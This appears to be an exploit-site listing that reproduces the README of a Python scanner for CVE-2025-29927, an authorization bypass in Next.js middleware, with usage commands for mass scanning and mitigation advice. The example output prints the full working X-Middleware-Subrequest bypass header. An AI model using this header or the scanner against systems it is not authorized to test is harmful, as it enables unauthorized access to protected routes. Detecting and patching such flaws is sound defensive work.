Exploit for CVE-2025-29927

Name: Exploit for CVE-2025-29927
Rating: 5 (130 reviews)
2025-04-06 | CVSS 9.1
## https://sploitus.com/exploit?id=7DB3F718-5315-504D-B64C-72D80A46718B
# CVE-2025-29927

## Next.js Middleware Bypass Scanner (CVE-2025-29927)

CVE-2025-29927 is a specialized security tool for detecting the Next.js middleware bypass vulnerability (CVE-2025-29927) affecting Next.js versions 11.1.4 through 15.2.2. This critical vulnerability allows attackers to bypass security controls by sending a specially crafted HTTP header.

## About the Vulnerability

The Next.js middleware bypass vulnerability (CVE-2025-29927) allows attackers to circumvent authorization controls by sending a malicious `X-Middleware-Subrequest` header that confuses the middleware processing logic. This can lead to unauthorized access to protected resources and routes.

**CVSS Score:** 9.1 (Critical)

## Features

- Fast concurrent scanning of multiple targets
- SSL certificate verification bypass option for IP-based scanning
- Silent mode for automation and focused output
- Detailed vulnerability information (status codes, bypass headers)
- Endpoint discovery for comprehensive testing

## Installation

```bash
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927

# Install requirements
pip install -r requirements.txt
```

## Usage

```bash
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
```

### Command Line Arguments

- `-t, --target`: Single target to scan (e.g., example.com or https://example.com)
- `-f, --file`: File containing list of targets (one per line)
- `-c, --concurrency`: Number of concurrent scans (default: 5)
- `-k, --insecure`: Disable SSL certificate verification (useful for IP addresses)
- `-s, --silent`: Silent mode - only show vulnerable targets

### Examples

Scan a single target:
```bash
python CVE-2025-29927.py -t example.com
```

Scan multiple targets from a file:
```bash
python CVE-2025-29927.py -f targets.txt
```

Scan with SSL verification disabled:
```bash
python CVE-2025-29927.py -t 192.168.1.1 -k
```

Automated scanning with silent mode:
```bash
python CVE-2025-29927.py -f targets.txt -k -s
```

Scan with a custom Header:
```bash
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
```

## Output

For vulnerable targets, MiddleWay displays:
- The vulnerable endpoint
- Original status code
- Bypassed status code
- The bypass header used for successful exploitation

Example output:
```
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
  Original status: 401
  Bypassed status: 200
  Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
```

## Mitigation

To mitigate this vulnerability:
1. Upgrade to Next.js 14.2.25, 15.2.3 or later
2. If upgrading is not possible, block the `X-Middleware-Subrequest` header at your WAF or server level

## Disclaimer

This tool is provided for security research and defensive purposes only. Always obtain proper authorization before scanning any systems you don't own. The authors are not responsible for any misuse of this tool.

## License

MIT